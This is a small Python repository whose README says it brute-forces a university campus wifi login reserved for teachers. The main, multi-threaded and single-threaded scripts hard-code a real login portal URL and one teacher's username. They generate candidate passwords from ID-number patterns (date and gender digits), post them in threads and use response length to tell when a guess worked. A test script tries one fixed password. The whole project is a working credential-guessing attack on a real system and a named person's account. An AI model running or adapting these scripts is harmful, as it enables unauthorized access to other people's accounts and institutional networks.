├── .idea
├── .name
├── HackCompusWifi.iml
├── encodings.xml
├── misc.xml
├── modules.xml
├── scopes
│ └── scope_settings.xml
├── vcs.xml
└── workspace.xml
├── README.md
├── main.py
├── multi_threaded_main.py
├── single_threaded_main.py
└── test.py
/.idea/.name:
--------------------------------------------------------------------------------
1 | HackCompusWifi
--------------------------------------------------------------------------------
/.idea/HackCompusWifi.iml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
--------------------------------------------------------------------------------
/.idea/encodings.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/.idea/misc.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/.idea/modules.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
--------------------------------------------------------------------------------
/.idea/scopes/scope_settings.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
--------------------------------------------------------------------------------
/.idea/vcs.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/.idea/workspace.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
109 |
110 |
111 |
112 |
113 |
114 |
115 |
116 |
117 |
118 |
119 |
120 |
121 |
122 |
123 |
124 |
125 |
126 |
127 |
128 |
129 |
130 |
131 |
132 |
133 |
134 |
135 |
136 |
137 |
138 |
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
157 |
158 |
159 |
160 |
161 |
162 |
163 |
164 |
165 |
166 |
167 |
168 |
169 |
170 |
171 |
172 |
173 |
174 |
175 |
178 |
179 |
180 |
181 |
182 |
183 |
184 |
185 |
186 |
187 |
188 |
189 |
190 |
191 |
192 |
193 |
194 |
195 |
196 |
197 |
198 |
199 |
200 |
201 |
202 |
203 |
204 |
205 |
206 |
207 |
208 |
209 |
210 |
211 |
212 |
213 |
214 |
215 |
216 |
217 |
218 |
219 |
220 |
221 |
222 |
223 |
224 |
225 |
226 |
227 |
228 |
229 |
230 |
231 |
232 |
233 |
234 |
235 |
236 |
237 |
238 |
239 |
240 |
241 |
242 |
243 |
244 |
245 |
246 |
247 |
248 |
249 |
250 |
251 |
252 |
253 |
254 |
255 |
256 |
257 |
258 |
259 |
260 |
261 |
262 |
263 |
264 |
265 |
266 |
267 |
268 |
269 |
270 |
271 |
272 |
273 |
274 |
275 |
276 |
277 |
278 |
279 |
280 |
281 |
282 |
283 |
284 |
285 |
286 |
287 |
288 |
289 |
290 |
291 |
292 |
293 |
294 |
295 |
296 |
297 |
298 |
299 |
300 |
301 |
302 |
303 |
304 |
305 |
306 |
307 |
308 |
309 |
310 |
311 |
312 |
313 |
314 |
315 |
316 |
317 |
318 |
319 |
320 |
321 |
322 |
323 |
324 |
325 |
326 |
327 |
328 |
329 |
330 |
331 |
332 |
333 |
334 |
335 |
336 |
337 |
338 |
339 |
340 |
341 |
342 |
343 |
344 |
345 |
346 |
347 |
348 |
349 |
350 |
351 |
352 |
353 |
354 |
355 |
356 |
357 |
358 |
359 |
360 |
361 |
362 |
363 |
364 |
365 |
366 |
367 |
368 |
369 |
370 |
371 |
372 |
373 |
374 |
375 |
376 |
377 |
378 |
379 |
380 |
381 |
382 |
383 |
384 |
385 |
386 |
387 |
388 |
389 |
390 |
391 |
392 |
393 |
394 |
395 |
396 |
397 |
398 |
399 |
400 |
401 |
402 |
403 |
404 |
405 |
406 |
407 |
408 |
409 |
410 |
411 |
412 |
413 |
414 |
415 |
416 |
417 |
418 |
419 |
420 |
421 |
422 |
423 |
424 |
425 |
426 |
427 |
428 |
429 |
430 |
436 |
437 |
438 |
443 |
444 |
445 |
446 |
447 |
448 |
449 |
450 |
451 |
452 | 1414215262790
453 | 1414215262790
454 |
455 |
456 |
457 |
458 |
459 |
460 |
461 |
462 |
463 |
464 |
465 |
466 |
467 |
468 |
469 |
470 |
471 |
472 |
473 |
474 |
475 |
476 |
477 |
478 |
479 |
480 |
481 |
482 |
483 |
484 |
485 |
486 |
487 |
488 |
489 |
490 |
491 |
492 |
493 |
494 |
495 |
496 |
497 |
498 |
499 |
500 |
501 |
502 |
505 |
508 |
509 |
510 |
511 |
512 |
513 |
516 |
517 |
518 |
519 |
520 |
521 |
522 |
523 |
524 |
525 |
526 |
527 |
528 |
529 |
530 |
531 |
532 |
533 |
534 |
535 |
536 |
537 |
538 |
539 |
540 |
541 |
542 |
543 |
544 |
545 |
546 |
547 |
548 |
549 |
550 |
551 |
552 |
553 |
554 |
555 |
556 |
557 |
558 |
559 |
560 |
561 |
562 |
563 |
564 |
565 |
566 |
567 |
568 |
569 |
570 |
571 |
572 |
573 |
574 |
575 |
576 |
577 |
578 |
579 |
580 |
581 |
582 |
583 |
584 |
585 |
586 |
587 |
588 |
589 |
590 |
591 |
592 |
593 |
594 |
595 |
596 |
597 |
598 |
599 |
600 |
601 |
602 |
603 |
604 |
605 |
606 |
607 |
608 |
609 |
610 |
611 |
612 |
613 |
614 |
615 |
616 |
617 |
618 |
619 |
620 |
621 |
622 |
623 |
624 |
625 |
626 |
627 |
628 |
629 |
630 |
631 |
632 |
633 |
634 |
635 |
636 |
637 |
638 |
639 |
640 |
641 |
642 |
643 |
644 |
645 |
646 |
647 |
648 |
649 |
650 |
651 |
652 |
653 |
654 |
655 |
656 |
657 |
658 |
659 |
660 |
661 |
662 |
663 |
664 |
665 |
666 |
667 |
668 |
669 |
670 |
671 |
672 |
673 |
674 |
675 |
676 |
677 |
678 |
679 |
680 |
681 |
682 |
683 |
684 |
685 |
686 |
687 |
688 |
689 |
690 |
691 |
692 |
693 |
694 |
695 |
696 |
697 |
698 |
699 |
700 |
701 |
702 |
703 |
704 |
705 |
706 |
707 |
708 |
709 |
710 |
711 |
712 |
713 |
714 |
715 |
716 |
717 |
718 |
719 |
720 |
721 |
722 |
723 |
724 |
725 |
726 |
727 |
728 |
729 |
730 |
731 |
732 |
733 |
734 |
735 |
736 |
737 |
738 |
739 |
740 |
741 |
742 |
743 |
744 |
745 |
746 |
747 |
748 |
749 |
750 |
751 |
752 |
753 |
754 |
755 |
756 |
757 |
758 |
759 |
760 |
761 |
762 |
763 |
764 |
765 |
766 |
767 |
768 |
769 |
770 |
771 |
772 |
773 |
774 |
775 |
776 |
777 |
778 |
779 |
780 |
781 |
782 |
783 |
784 |
785 |
786 |
787 |
788 |
789 |
790 |
791 |
792 |
793 |
794 |
795 |
796 |
797 |
798 |
799 |
800 |
801 |
802 |
803 |
804 |
805 |
806 |
807 |
808 |
809 |
810 |
811 |
812 |
813 |
814 |
815 |
816 |
817 |
818 |
819 |
820 |
821 |
822 |
823 |
824 |
825 |
826 |
827 |
828 |
829 |
830 |
831 |
832 |
833 |
834 |
835 |
836 |
837 |
838 |
839 |
840 |
841 |
842 |
843 |
844 |
845 |
846 |
847 |
848 |
849 |
850 |
851 |
852 |
853 |
854 |
855 |
856 |
857 |
858 |
859 |
860 |
861 |
862 |
863 |
864 |
865 |
866 |
867 |
868 |
869 |
870 |
871 |
872 |
873 |
874 |
875 |
876 |
877 |
878 |
879 |
880 |
881 |
882 |
883 |
884 |
885 |
886 |
887 |
888 |
889 |
890 |
891 |
892 |
893 |
894 |
895 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | #HackCompusWifi
2 | This is a small program to brute-force the wifi in campus which is originally for the teachers to use.
3 |
4 | ##Tools
5 | Wireshark
6 | Requests library in Python
7 | Multiprocessing library in Python
8 |
9 | ##Environment
10 | OS : OS X Yosemite(version 10.10)
11 | Browser: Chrome
12 |
13 | ##Speed
14 | Since I only knew that the password is initially the last six digits in the teacher's ID, I can only brute-force it at the present,so I hardly expect its high speed.
15 |
16 | ###Improvement
17 | After support multi-threading,the speed improved a lot.
18 |
19 | To the same username:
20 | Without multi-threading: **259.13s**
21 | With multi-threading: **43.24s**
22 |
23 |
24 | ##What to do next ?
25 | GUI for the program
--------------------------------------------------------------------------------
/main.py:
--------------------------------------------------------------------------------
1 | __author__ = 'lms'
2 |
3 | import requests
4 | import time
5 | import multiprocessing.dummy as multiThreading
6 | import multiprocessing
7 | import string
8 |
9 |
10 | request_url = "http://w.nuaa.edu.cn/iPortal/action/doLogin.do"
11 | login_info = {
12 | 'username': '70204838',
13 | 'password': '',
14 | 'saved': '1',
15 | "from": '003cc944be32e25365428f2dd2adbbe2',
16 | 'domain': '1'
17 | }
18 |
19 | headers = {
20 | 'Accept': 'application/json, text/javascript, */*; q=0.01',
21 | 'Accept-Language': 'zh-CN,zh;q=0.8,en;q=0.6',
22 | 'Connection': 'keep-alive',
23 | 'Content-Type': 'application/x-www-form-urlencoded',
24 | 'Host': 'w.nuaa.edu.cn',
25 | 'Origin': 'http://w.nuaa.edu.cn',
26 | 'Referer': 'http://w.nuaa.edu.cn/iPortal/index.htm?'
27 | 'from=003cc944be32e25365428f2dd2adbbe2&wlanuserfirsturl=http://www.baidu.com/',
28 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) '
29 | 'Chrome/38.0.2125.104 Safari/537.36',
30 | 'X-Requested-With': 'XMLHttpRequest'
31 |
32 | }
33 | password_array = ['', '', '', '']
34 | password_divi = [0, 25, 50, 75]
35 | password_prefix = ['01', '02', '03', '04', '05', '06', '07', '08', '09']
36 | password_middle = ['00', '01', '02', '03', '04', '05', '06', '07', '08', '09']
37 | password_index = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
38 | password_male = ['1', '3', '5', '7', '9']
39 | password_female = ['0', '2', '4', '6', '8']
40 |
41 | for prefix in range(10, 32):
42 | password_prefix.append(str(prefix))
43 | for middle in range(10, 100):
44 | password_middle.append(str(middle))
45 |
46 | def verify(index, sem):
47 | for j in range(25):
48 | for m in range(5):
49 | for n in range(10):
50 | if sem.is_set():
51 | return
52 |
53 | password_array[index] = '27'+password_middle[password_divi[index]+j]+password_male[m]+password_index[n]
54 | login_info['password'] = password_array[index]
55 | loginRequest = requests.post(request_url, data=login_info, headers=headers)
56 |
57 | print password_array[index]
58 | if string.atoi(loginRequest.headers['content-length']) >= 258:
59 | lock.acquire()
60 | password = password_array[index]
61 | print "The password is " + password
62 | sem.set()
63 | lock.release()
64 | end_time = time.time()
65 | print "The time spent is " + str(end_time-start_time)
66 | return
67 |
68 |
69 | if __name__ == "__main__":
70 | sem = multiThreading.Event() #use semaphore
71 | lock = multiprocessing.Lock()
72 | start_time = time.time()
73 | for index in range(4):
74 | multiThreading.Process(target=verify, args=(index, sem)).start()
75 |
76 |
--------------------------------------------------------------------------------
/multi_threaded_main.py:
--------------------------------------------------------------------------------
1 | __author__ = 'lms'
2 |
3 | import requests
4 | import time
5 | import multiprocessing.dummy as multiThreading
6 | import multiprocessing
7 | import string
8 |
9 |
10 | request_url = "http://w.nuaa.edu.cn/iPortal/action/doLogin.do"
11 | login_info = {
12 | 'username': '70204838',
13 | 'password': '',
14 | 'saved': '1',
15 | "from": '003cc944be32e25365428f2dd2adbbe2',
16 | 'domain': '1'
17 | }
18 |
19 | headers = {
20 | 'Accept': 'application/json, text/javascript, */*; q=0.01',
21 | 'Accept-Language': 'zh-CN,zh;q=0.8,en;q=0.6',
22 | 'Connection': 'keep-alive',
23 | 'Content-Type': 'application/x-www-form-urlencoded',
24 | 'Host': 'w.nuaa.edu.cn',
25 | 'Origin': 'http://w.nuaa.edu.cn',
26 | 'Referer': 'http://w.nuaa.edu.cn/iPortal/index.htm?'
27 | 'from=003cc944be32e25365428f2dd2adbbe2&wlanuserfirsturl=http://www.baidu.com/',
28 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) '
29 | 'Chrome/38.0.2125.104 Safari/537.36',
30 | 'X-Requested-With': 'XMLHttpRequest'
31 |
32 | }
33 |
34 | password_divi = [0, 25, 50, 75]
35 | password_prefix = ['01', '02', '03', '04', '05', '06', '07', '08', '09']
36 | password_middle = ['00', '01', '02', '03', '04', '05', '06', '07', '08', '09']
37 | password_index = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
38 | password_male = ['1', '3', '5', '7', '9']
39 | password_female = ['0', '2', '4', '6', '8']
40 |
41 | for prefix in range(10, 32):
42 | password_prefix.append(str(prefix))
43 | for middle in range(10, 100):
44 | password_middle.append(str(middle))
45 |
46 | def verify(index, sem):
47 | for j in range(25):
48 | for m in range(5):
49 | for n in range(10):
50 | if sem.is_set():
51 | return
52 |
53 | login_info['password'] = '27'+password_middle[password_divi[index]+j]+password_male[m]+password_index[n]
54 | loginRequest = requests.post(request_url, data=login_info, headers=headers)
55 |
56 | if string.atoi(loginRequest.headers['content-length']) >= 258:
57 | lock.acquire()
58 | print "The password is " + login_info['password']
59 | sem.set()
60 | lock.release()
61 | end_time = time.time()
62 | print "The time spent is " + str(end_time-start_time)
63 | return
64 |
65 |
66 | if __name__ == "__main__":
67 | sem = multiThreading.Event() #use semaphore
68 | lock = multiprocessing.Lock()#use lock
69 | start_time = time.time()
70 | for index in range(4):
71 | multiThreading.Process(target=verify, args=(index, sem)).start()
72 |
--------------------------------------------------------------------------------
/single_threaded_main.py:
--------------------------------------------------------------------------------
1 | __author__ = 'lms'
2 | import requests
3 |
4 | request_url = "http://w.nuaa.edu.cn/iPortal/action/doLogin.do"
5 | login_info = {
6 | 'username':'70204838',
7 | 'password': '',
8 | 'saved': '1',
9 | "from": '003cc944be32e25365428f2dd2adbbe2',
10 | 'domain': 'nuaa'
11 | }
12 |
13 | headers = {
14 | 'Accept': 'application/json, text/javascript, */*; q=0.01',
15 | 'Accept-Language':'zh-CN,zh;q=0.8,en;q=0.6',
16 | 'Connection':'keep-alive',
17 | 'Content-Type':'application/x-www-form-urlencoded',
18 | 'Host':'w.nuaa.edu.cn',
19 | 'Origin':'http://w.nuaa.edu.cn',
20 | 'Referer':'http://w.nuaa.edu.cn/iPortal/index.htm?'
21 | 'from=003cc944be32e25365428f2dd2adbbe2&wlanuserfirsturl=http://www.baidu.com/',
22 | 'User-Agen':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) '
23 | 'Chrome/38.0.2125.104 Safari/537.36',
24 | 'X-Requested-With':'XMLHttpRequest'
25 | }
26 |
27 | #password =''
28 | password_prefix = ['01', '02', '03', '04', '05', '06', '07', '08', '09']
29 | password_index = []
30 | password_male=['1','3','5','7']
31 | password_female=['0','2','4','6','8']
32 | for prefix in range(10,32):
33 | password_prefix.append(str(prefix))
34 | for middle in range(10):
35 | password_index.append(str(middle))
36 |
37 |
38 | for i in range(31):
39 | for j in range(10):
40 | for k in range(10):
41 | for m in range(5):
42 | for n in range(10):
43 | password='27'+password_index[j]+password_index[k]+password_female[m]+password_index[n]
44 | #print password
45 | login_info['password']=password
46 | print password
47 | loginRequest = requests.post(request_url,data=login_info,headers=headers)
48 | if(loginRequest.headers['content-length']=='258'):
49 | print login_info['password']
50 | break
51 |
52 |
53 |
54 |
55 |
--------------------------------------------------------------------------------
/test.py:
--------------------------------------------------------------------------------
1 | __author__ = 'lms'
2 |
3 | import requests
4 |
5 | request_url = "http://w.nuaa.edu.cn/iPortal/action/doLogin.do"
6 | login_info = {
7 | 'username': '70204838',
8 | 'password': '',
9 | 'saved': '1',
10 | "from": '003cc944be32e25365428f2dd2adbbe2',
11 | 'domain': '1'
12 | }
13 |
14 | headers = {
15 | 'Accept': 'application/json, text/javascript, */*; q=0.01',
16 | 'Accept-Language': 'zh-CN,zh;q=0.8,en;q=0.6',
17 | 'Connection': 'keep-alive',
18 | 'Content-Type': 'application/x-www-form-urlencoded',
19 | 'Host': 'w.nuaa.edu.cn',
20 | 'Origin': 'http://w.nuaa.edu.cn',
21 | 'Referer': 'http://w.nuaa.edu.cn/iPortal/index.htm?'
22 | 'from=003cc944be32e25365428f2dd2adbbe2&wlanuserfirsturl=http://www.baidu.com/',
23 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) '
24 | 'Chrome/38.0.2125.104 Safari/537.36',
25 | 'X-Requested-With': 'XMLHttpRequest'
26 |
27 | }
28 |
29 | login_info['password'] = '273415'
30 | loginRequest = requests.post(request_url, data=login_info, headers=headers)
31 | print loginRequest.headers
--------------------------------------------------------------------------------